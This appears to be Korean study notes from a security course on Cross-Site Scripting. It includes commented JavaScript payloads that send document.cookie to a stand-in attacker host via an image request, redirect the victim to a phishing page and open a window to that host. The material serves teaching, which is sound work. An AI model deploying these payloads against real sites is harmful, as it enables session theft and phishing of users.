#1. Cross-Site-Scripting (XSS)
XSS

c. XSS 예시
//쿠키 및 세션 탈취 공격 코드
<script>
alert("hello"); // "hello" 문자열 alert 실행.
document.cookie; // 현재 페이지의 쿠키(return type: string)
alert(document.cookie); // 현재 페이지의 쿠키를 인자로 가진 alert 실행.
document.cookie = "name=test;"; // 쿠키 생성(key: name, value: test)
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>
<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing";
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>
Stored XSS
Reflected XSS
#2. [함께실습] XSS
#3. [혼자실습] XSS